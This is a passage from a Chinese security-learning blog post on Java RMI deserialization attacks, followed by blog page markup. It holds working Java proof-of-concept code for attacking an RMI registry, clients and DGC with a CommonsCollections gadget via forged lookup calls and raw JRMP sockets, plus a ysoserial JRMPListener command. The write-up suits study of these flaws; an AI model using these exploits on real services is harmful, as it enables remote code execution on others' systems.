        &#x2F;&#x2F;下面部分就是创建一个Remote类型的动态代理，因为bind的第二个参数要求传入Remote类型的
        Class&lt;?&gt; aClass &#x3D; Class.forName(&quot;sun.reflect.annotation.AnnotationInvocationHandler&quot;);
        Constructor&lt;?&gt; declaredConstructor &#x3D; aClass.getDeclaredConstructor(Class.class, Map.class);
        HashMap&lt;String, Object&gt; map &#x3D; new HashMap&lt;&gt;();
        map.put(&quot;ethe&quot;,o);
        declaredConstructor.setAccessible(true);
        InvocationHandler o1 &#x3D; (InvocationHandler)declaredConstructor.newInstance(Override.class,map);
        Remote remote &#x3D; (Remote) Proxy.newProxyInstance(Remote.class.getClassLoader(), new Class[]&#123;Remote.class&#125;, o1);
        registry.bind(&quot;iRemoteObj&quot;,remote);
&#x2F;&#x2F;        Naming.bind(&quot;rmi:&#x2F;&#x2F;127.0.0.1&#x2F;iRemoteObj&quot;,iRemoteObj);
    &#125;
&#125;</code></pre>

<p>这里我本来想让这个cc1的文件直接继承Remote接口的，但是发现即使继承了，由于他返回的是个HashMap，也不能让HashMap强转成Remote，而要让HashMap也继承Remote接口的话就只能改源码了</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230520122455415.png" alt="image-20230520122455415"></p>
<h3 id="调用lookup-amp-unbind"><a href="#调用lookup-amp-unbind" class="headerlink" title="调用lookup&amp;unbind"></a>调用lookup&amp;unbind</h3><p>这两个只能传入String类型的参数</p>
<p>由于这俩是客户端调用的，所以他们肯定是要到RegistryImpl_Stub里的lookup方法</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230520123301488.png" alt="image-20230520123301488"></p>
<p>由于参数var1只能为String类，所以我们需要自己伪造实现lookup方法，并在<code>var3.writeObject(var1);</code>中将我们的恶意类传入。</p>
<p>首先获取ref对象，以下是RegistryImpl_Stub的继承图</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230520123508569.png" alt="image-20230520123508569"></p>
<p>ref是RemoteObject的属性，我们可以通过反射调用来获取</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230520123540259.png" alt="image-20230520123540259"></p>
<pre class="language-java" data-language="java"><code class="language-java">Class&lt;?&gt; RO &#x3D; Class.forName(&quot;java.rmi.server.RemoteObject&quot;);
Field declaredField &#x3D; RO.getDeclaredField(&quot;ref&quot;);
declaredField.setAccessible(true);
RemoteRef ref &#x3D; (RemoteRef)declaredField.get(registry);</code></pre>

<p>然后再去获得super.ref.newCall的参数operations</p>
<p>方式一样</p>
<pre class="language-java" data-language="java"><code class="language-java">Class&lt;?&gt; RegistryImpl_Stub &#x3D; Class.forName(&quot;sun.rmi.registry.RegistryImpl_Stub&quot;);
Field operations_field &#x3D; RegistryImpl_Stub.getDeclaredField(&quot;operations&quot;);
operations_field.setAccessible(true);
Operation[] operations &#x3D; (Operation[])operations_field.get(registry);</code></pre>

<p>然后就是伪造这一部分</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230520125250620.png" alt="image-20230520125250620"></p>
<p>完整poc为</p>
<pre class="language-java" data-language="java"><code class="language-java">public class RMIClient &#123;
    public static void main(String[] args) throws Exception &#123;
&#x2F;&#x2F;        System.setProperty(&quot;java.rmi.server.codebase&quot;, &quot;http:&#x2F;&#x2F;127.0.0.1:7777&#x2F;&quot;);
&#x2F;&#x2F;        evil evil &#x3D; new evil();
        Registry registry &#x3D; LocateRegistry.getRegistry(&quot;127.0.0.1&quot;, 1097);
&#x2F;&#x2F;        IRemoteObj remoteObj &#x3D; (IRemoteObj) registry.lookup(&quot;iRemoteObj&quot;);
	&#x2F;&#x2F;获取ref
        Class&lt;?&gt; RO &#x3D; Class.forName(&quot;java.rmi.server.RemoteObject&quot;);
        Field declaredField &#x3D; RO.getDeclaredField(&quot;ref&quot;);
        declaredField.setAccessible(true);
        RemoteRef ref &#x3D; (RemoteRef)declaredField.get(registry);
     &#x2F;&#x2F;获取 operations  
        Class&lt;?&gt; RegistryImpl_Stub &#x3D; Class.forName(&quot;sun.rmi.registry.RegistryImpl_Stub&quot;);
        Field operations_field &#x3D; RegistryImpl_Stub.getDeclaredField(&quot;operations&quot;);
        operations_field.setAccessible(true);
        Operation[] operations &#x3D; (Operation[])operations_field.get(registry);

        Object o &#x3D; cc1.cc1exp();
&#x2F;&#x2F;伪造lookup
        RemoteCall var2 &#x3D; ref.newCall((RemoteObject) registry, operations, 2, 4905912898345647071L);
        ObjectOutput var3 &#x3D; var2.getOutputStream();
        var3.writeObject(o);
        ref.invoke(var2);
    &#125;
&#125;</code></pre>

<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230520131630621.png" alt="image-20230520131630621"></p>
<p>攻击完成，这其实就是绕过系统自带的lookup方法，自己写一个lookup，然后就可以随意传参了。</p>
<p>而且只需要重写到<code>super.ref.invoke(var2);</code>就行，毕竟我们只需要在注册中心的服务端调用<code>RegistryImpl_Skel#dispatch</code>然后执行我们的恶意代码。</p>
<h2 id="攻击客户端-1"><a href="#攻击客户端-1" class="headerlink" title="攻击客户端"></a>攻击客户端</h2><p>对于客户端来说，有两个反序列化并可以被利用的地方</p>
<ul>
<li>从 Registry 端获取调用服务的 stub 并反序列化</li>
<li>调用服务后获取结果并反序列化</li>
</ul>
<h3 id="恶意Server-Stub"><a href="#恶意Server-Stub" class="headerlink" title="恶意Server Stub"></a>恶意Server Stub</h3><p>这个和服务端攻击注册中心的方式差不多（整体上来看</p>
<p>在服务端攻击注册中心的地方我们提到，由于服务端和注册中心在一起，倘若不使用getRegistry，则反序列化不会触发。</p>
<p>但是现在来看，如果不触发，Client端调用lookup进行服务发现时，会拿到Server端在Registry端注册的恶意代理对象并进行反序列化。</p>
<p>所以代码都是差不多的，只是直接用<code>LocateRegistry.createRegistry(1098);</code>获取注册中心就行</p>
<p>客户端就正常客户端</p>
<p>服务端代码为</p>
<pre class="language-java" data-language="java"><code class="language-java">public class RMIServer &#123;
    public static void main(String[] args) throws IOException, AlreadyBoundException, NoSuchFieldException, ClassNotFoundException, InvocationTargetException, NoSuchMethodException, InstantiationException, IllegalAccessException &#123;
        &#x2F;&#x2F;创建远程对象
        IRemoteObjImpl iRemoteObj &#x3D; new IRemoteObjImpl();
        &#x2F;&#x2F;创建注册中心
        Registry registry &#x3D; LocateRegistry.createRegistry(1097);
        Object o &#x3D; cc1.cc1exp();
        Class&lt;?&gt; aClass &#x3D; Class.forName(&quot;sun.reflect.annotation.AnnotationInvocationHandler&quot;);
        Constructor&lt;?&gt; declaredConstructor &#x3D; aClass.getDeclaredConstructor(Class.class, Map.class);
        HashMap&lt;String, Object&gt; map &#x3D; new HashMap&lt;&gt;();
        map.put(&quot;ethe&quot;,o);
        declaredConstructor.setAccessible(true);
        InvocationHandler o1 &#x3D; (InvocationHandler)declaredConstructor.newInstance(Override.class,map);
        Remote remote &#x3D; (Remote) Proxy.newProxyInstance(Remote.class.getClassLoader(), new Class[]&#123;Remote.class&#125;, o1);
        registry.bind(&quot;iRemoteObj&quot;,remote);
    &#125;
&#125;
</code></pre>

<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230520142100636.png" alt="image-20230520142100636"></p>
<p>这也就是RegistryImpl_Stub#lookup-&gt;注册中心攻击客户端的路线</p>
<h3 id="恶意Server端返回值"><a href="#恶意Server端返回值" class="headerlink" title="恶意Server端返回值"></a>恶意Server端返回值</h3><p>根据我们之前的一些分析，我们知道，服务端会反序列化客户端传过来的参数，导致了恶意服务参数攻击。</p>
<p>同样，客户端也会反序列化服务端返回的值，造成恶意Server端返回值攻击</p>
<p>这里客户端和服务端都可以用正常的代码，修改实现类就行</p>
<pre class="language-java" data-language="java"><code class="language-java">public Object sayHello(String a) throws IOException, NoSuchFieldException, ClassNotFoundException, InvocationTargetException, NoSuchMethodException, InstantiationException, IllegalAccessException &#123;
    String name &#x3D; this.getClass().getName();
    System.out.println(a);
    Object o &#x3D; cc1.cc1exp();
    return o;
&#125;</code></pre>

<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230520144136035.png" alt="image-20230520144136035"></p>
<h3 id="动态类加载"><a href="#动态类加载" class="headerlink" title="动态类加载"></a>动态类加载</h3><p>和攻击服务端的一样，把角色换过来就好了，感觉没啥说的</p>
<h2 id="攻击DGC"><a href="#攻击DGC" class="headerlink" title="攻击DGC"></a>攻击DGC</h2><p>在前言里我们还提到了用DGCImpl_Skel#dispatch和DGCImpl_Stub#dirty攻击服务端和客户端的路线</p>
<p>它的通信过程是<strong>Server 端启动 DGCImpl，在 Registry 端注册 DGCImpl_Stub ，Client 端获取到 DGCImpl_Stub，通过其与 Server 端通信，Server 端使用 RegistryImpl_Skel 来处理</strong>。</p>
<h3 id="DGC客户端打DGC服务端"><a href="#DGC客户端打DGC服务端" class="headerlink" title="DGC客户端打DGC服务端"></a>DGC客户端打DGC服务端</h3><p>DGC之间的通信也是借助序列化和反序列化的，我们只需要构造一个DGC通信并在指定的位置写入序列化恶意类，经由DGC传输到DGC服务端，从而触发反序列化。</p>
<p>同时，由于 DGC 通信和 RMI 通信在 Transport 层是同样的处理逻辑，只不过根据 Client 端写入的标记ObjID(在初始化LiveRef的时候创建，DGC的ObjID是特定的<code>new ObjID(2);</code>)来区分是是由 RegistryImpl_Skel 还是 DGCImpl_Skel 来处理</p>
<p>(这块没太懂，主要是没找到区分是是由 RegistryImpl_Skel 还是 DGCImpl_Skel 来处理的代码)</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230520163947253.png" alt="image-20230520163947253"></p>
<p>然后思路就是通过控制id值，让服务端误认为这个是DGC的东西，然后进入DGCImpl_Skel 里去触发漏洞点</p>
<pre class="language-java" data-language="java"><code class="language-java">public static void makeDGCCall ( String hostname, int port, Object payloadObject ) throws IOException, UnknownHostException, SocketException &#123;
  InetSocketAddress isa &#x3D; new InetSocketAddress(hostname, port);
  Socket s &#x3D; null;
  DataOutputStream dos &#x3D; null;
  try &#123;
    &#x2F;&#x2F; 在TCP(Transport)层获取连接
    s &#x3D; SocketFactory.getDefault().createSocket(hostname, port);
    s.setKeepAlive(true);
    s.setTcpNoDelay(true);

    &#x2F;&#x2F; 取出数据流OutputStream，这里对着类似的writeObject方法来看
    OutputStream os &#x3D; s.getOutputStream();
    dos &#x3D; new DataOutputStream(os);

    &#x2F;&#x2F; 写一些TCP传输的必要标志
    dos.writeInt(TransportConstants.Magic);
    dos.writeShort(TransportConstants.Version);
    dos.writeByte(TransportConstants.SingleOpProtocol);
    dos.write(TransportConstants.Call);

    @SuppressWarnings ( &quot;resource&quot; )
    &#x2F;&#x2F; 下面才是真正的对应到代码层面，从TCPTransport#handleMessages方法开始
    final ObjectOutputStream objOut &#x3D; new MarshalOutputStream(dos);

    &#x2F;&#x2F; 写ObjID，2代表DGC，后面接着3个代表随机数，随便写
    &#x2F;&#x2F; 对应sun.rmi.transport.Transport#serviceCall方法中的
    &#x2F;&#x2F; var39 &#x3D; ObjID.read(var1.getInputStream());
    objOut.writeLong(2); &#x2F;&#x2F; DGC
    objOut.writeInt(0);
    objOut.writeLong(0);
    objOut.writeShort(0);

    &#x2F;&#x2F; 选择DGCImpl的操作，dirty或clean都可以
    &#x2F;&#x2F; 对应sun.rmi.server.UnicastServerRef#dispatch方法中的
    &#x2F;&#x2F; int var3 &#x3D; var39.readInt();
    objOut.writeInt(1); &#x2F;&#x2F; dirty

    &#x2F;&#x2F; 写DGC接口的hash，值就是-669196253586618813L
    &#x2F;&#x2F; 对应sun.rmi.server.UnicastServerRef#oldDispatch中的
    &#x2F;&#x2F; var4 &#x3D; var18.readLong();
    &#x2F;&#x2F; 以及sun.rmi.transport.DGCImpl_Skel#dispatch中的判断
    objOut.writeLong(-669196253586618813L);

    objOut.writeObject(payloadObject);

    os.flush();
  &#125;
  finally &#123;
    if ( dos !&#x3D; null ) &#123;
      dos.close();
    &#125;
    if ( s !&#x3D; null ) &#123;
      s.close();
    &#125;
  &#125;
&#125;</code></pre>

<p>原理懂了，代码写不出来<img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/QVJIZ6DSFAY9Y0PP@Q_2%7D8R.gif" alt="img"></p>
<p>抄一下其他人的做的图</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/20200622140434-3edd6486-b44e-1.png" alt="20200622140434-3edd6486-b44e-1"></p>
<p>这个攻击手段<strong>实际上就是 ysoserial 中的 ysoserial.exploit.JRMPClient 的实现原理</strong></p>
<p>DGC其实客户端、注册中心、服务端都能打，但是因为只有注册中心的端口是确认的，所以一般都是打注册中心</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230520165828619.png" alt="image-20230520165828619"></p>
<p>调用链</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230520170306699.png" alt="image-20230520170306699"></p>
<p>ysoserial里用的是使用socket重写了JRMP协议，这里还有另一种方式，就是获取DGCImpl_Stub对象，重写dirty方法，在DGCImpl_Skel#dispatch中触发反序列化，跟打注册中心的差不多</p>
<p>就跟客户端攻击注册中心的时候重写lookup差不多</p>
<h3 id="DGC服务端打客户端"><a href="#DGC服务端打客户端" class="headerlink" title="DGC服务端打客户端"></a>DGC服务端打客户端</h3><p>同样的道理可以用DGC服务端打客户端，在DGCImpl_Stub触发反序列化。但是既然最后调用的都是call.executeCall();，那为啥不用UnicastRef#invoke-&gt;StreamRemoteCall#executeCall-&gt;注册中心/服务端攻击客户端这条路呢。这篇没提这条链，是因为他还有更重要的使命（</p>
<h2 id="攻击JRMP客户端"><a href="#攻击JRMP客户端" class="headerlink" title="攻击JRMP客户端"></a>攻击JRMP客户端</h2><p>前面分析过，只要客户端的stub发起JRMP请求，就会调用UnicastRef#invoke，也就会调用StreamRemoteCall#executeCall，假设在异常处理的时候满足了那个判断，就会导致被反序列化攻击。这里想实现攻击需要自己实现一个恶意服务端，把返回的异常信息改成payload，其实这就是ysoserial里面的exploit/JRMPListener实现的功能。具体实现大概就是从TCPTransport#run0拷过来，没用的删删，改改最后处理的地方。<br>具体使用是先启动监听</p>
<p><code>java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections6 calc.exe</code></p>
<p>然后启用客户端去向这个恶意服务端端发起请求</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230521142412750.png" alt="image-20230521142412750"></p>
<h1 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h1><p><a target="_blank" rel="noopener" href="https://www.freebuf.com/vuls/346762.html">https://www.freebuf.com/vuls/346762.html</a></p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/7930">https://xz.aliyun.com/t/7930</a></p>
<p><a target="_blank" rel="noopener" href="https://yagsheg.com/2021/11/29/RMI-%E6%94%BB%E5%87%BB%E6%96%B9%E5%BC%8F%E5%A4%8D%E7%9B%98%E6%80%BB%E7%BB%93/">https://yagsheg.com/2021/11/29/RMI-%E6%94%BB%E5%87%BB%E6%96%B9%E5%BC%8F%E5%A4%8D%E7%9B%98%E6%80%BB%E7%BB%93/</a></p>
<p><a target="_blank" rel="noopener" href="https://goodapple.top/archives/520">https://goodapple.top/archives/520</a></p>
<p><a target="_blank" rel="noopener" href="https://su18.org/post/rmi-attack/">https://su18.org/post/rmi-attack/</a></p>
<p><a target="_blank" rel="noopener" href="https://halfblue.github.io/2021/11/02/RMI%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E4%B9%8B%E4%B8%89%E9%A1%BE%E8%8C%85%E5%BA%90-%E6%94%BB%E5%87%BB%E5%AE%9E%E7%8E%B0/">RMI反序列化漏洞之三顾茅庐-攻击实现 | Halfblue</a></p>
<p><a target="_blank" rel="noopener" href="https://townmacro.cn/2022/04/18/java-%E5%AE%89%E5%85%A8-rmi%E5%AD%A6%E4%B9%A0%E6%80%BB%E7%BB%93/">Java 安全-RMI学习总结 (townmacro.cn)</a></p>
<p><a target="_blank" rel="noopener" href="https://paper.seebug.org/1091/#serverrmi-server">Java 中 RMI、JNDI、LDAP、JRMP、JMX、JMS那些事儿（上） (seebug.org)</a></p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">Ethe</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://Ethe448.github.io/2023/05/18/RMI%E6%94%BB%E5%87%BB%EF%BC%88%E4%BA%8C%EF%BC%89/">https://Ethe448.github.io/2023/05/18/RMI%E6%94%BB%E5%87%BB%EF%BC%88%E4%BA%8C%EF%BC%89/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">Ethe</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/web%E5%AD%A6%E4%B9%A0/">
                                    <span class="chip bg-color">web学习</span>
                                </a>
                            
                                <a href="/tags/Java/">
                                    <span class="chip bg-color">Java</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="https://epicture.oss-cn-beijing.aliyuncs.com/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="https://epicture.oss-cn-beijing.aliyuncs.com/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    
        <style>
    .valine-card {
        margin: 1.5rem auto;
    }

    .valine-card .card-content {
        padding: 20px 20px 5px 20px;
    }

    #vcomments textarea {
        box-sizing: border-box;
        background: url("https://epicture.oss-cn-beijing.aliyuncs.com/medias/comment_bg.png") 100% 100% no-repeat;
    }

    #vcomments p {
        margin: 2px 2px 10px;
        font-size: 1.05rem;
        line-height: 1.78rem;
    }

    #vcomments blockquote p {
        text-indent: 0.2rem;
    }

    #vcomments a {
        padding: 0 2px;
        color: #4cbf30;
        font-weight: 500;
        text-decoration: none;
    }

    #vcomments img {
        max-width: 100%;
        height: auto;
        cursor: pointer;
    }

    #vcomments ol li {
        list-style-type: decimal;
    }

    #vcomments ol,
    ul {
        display: block;
        padding-left: 2em;
        word-spacing: 0.05rem;
    }

    #vcomments ul li,
    ol li {
        display: list-item;
        line-height: 1.8rem;
        font-size: 1rem;
    }

    #vcomments ul li {
        list-style-type: disc;
    }

    #vcomments ul ul li {
        list-style-type: circle;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    #vcomments table, th, td {
        border: 0;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments h1 {
        font-size: 1.85rem;
        font-weight: bold;
        line-height: 2.2rem;
    }

    #vcomments h2 {
        font-size: 1.65rem;
        font-weight: bold;
        line-height: 1.9rem;
    }

    #vcomments h3 {
        font-size: 1.45rem;
        font-weight: bold;
        line-height: 1.7rem;
    }

    #vcomments h4 {
        font-size: 1.25rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    #vcomments h5 {
        font-size: 1.1rem;
        font-weight: bold;
        line-height: 1.4rem;
    }

    #vcomments h6 {
        font-size: 1rem;
        line-height: 1.3rem;
    }

    #vcomments p {
        font-size: 1rem;
        line-height: 1.5rem;
    }

    #vcomments hr {
        margin: 12px 0;
        border: 0;
        border-top: 1px solid #ccc;
    }

    #vcomments blockquote {
        margin: 15px 0;
        border-left: 5px solid #42b983;
        padding: 1rem 0.8rem 0.3rem 0.8rem;
        color: #666;
        background-color: rgba(66, 185, 131, .1);
    }

    #vcomments pre {
        font-family: monospace, monospace;
        padding: 1.2em;
        margin: .5em 0;
        background: #272822;
        overflow: auto;
        border-radius: 0.3em;
        tab-size: 4;
    }

    #vcomments code {
        font-family: monospace, monospace;
        padding: 1px 3px;
        font-size: 0.92rem;
        color: #e96900;
        background-color: #f8f8f8;
        border-radius: 2px;
    }

    #vcomments pre code {
        font-family: monospace, monospace;
        padding: 0;
        color: #e8eaf6;
        background-color: #272822;
    }

    #vcomments pre[class*="language-"] {
        padding: 1.2em;
        margin: .5em 0;
    }

    #vcomments code[class*="language-"],
    pre[class*="language-"] {
        color: #e8eaf6;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }

    #vcomments b,
    strong {
        font-weight: bold;
    }

    #vcomments dfn {
        font-style: italic;
    }

    #vcomments small {
        font-size: 85%;
    }

    #vcomments cite {
        font-style: normal;
    }

    #vcomments mark {
        background-color: #fcf8e3;
        padding: .2em;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }
</style>

<div class="card valine-card" data-aos="fade-up">
    <div class="comment_headling" style="font-size: 20px; font-weight: 700; position: relative; padding-left: 20px; top: 15px; padding-bottom: 5px;">
        <i class="fas fa-comments fa-fw" aria-hidden="true"></i>
        <span>评论</span>
    </div>
    <div id="vcomments" class="card-content" style="display: grid">
    </div>
</div>

<script src="/libs/valine/av-min.js"></script>
<script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/valine/Valine.min.js"></script>
<script>
    new Valine({
        el: '#vcomments',
        appId: '9uxoX9BlIsmwlt8gNkGLF9Ow-gzGzoHsz',
        appKey: 'rrsgRW80sgJP9PdFwFycskT9',
        notify: 'false' === 'true',
        verify: 'false' === 'true',
        visitor: 'true' === 'true',
        avatar: 'mm',
        pageSize: '8',
        lang: 'zh-cn',
        placeholder: 'just go go'
    });
</script>

<!--酷Q推送-->


    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2023/05/19/%E8%AE%B0%E4%BA%8B%E7%B0%BF/">
                    <div class="card-image">
                        
                        
                        <img src="https://epicture.oss-cn-beijing.aliyuncs.com/medias/featureimages/9.jpg" class="responsive-img" alt="记事簿">
                        
                        <span class="card-title">记事簿</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            单独开篇文章记一下自己每天都干嘛了，督促一下自己，虽然现在记好像有点晚了hhh
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2023-05-19
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            Ethe
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/%E9%9A%8F%E7%AC%94/">
                        <span class="chip bg-color">随笔</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2023/05/07/fastjson%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">
                    <div class="card-image">
                        
                        
                        <img src="https://epicture.oss-cn-beijing.aliyuncs.com/medias/featureimages/0.jpg" class="responsive-img" alt="">
                        
                        <span class="card-title"></span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2023-05-07
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            Ethe
                            
                        </span>
                    </div>
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/tocbot/tocbot.min.js"></script>
<script>
$(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h1, h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
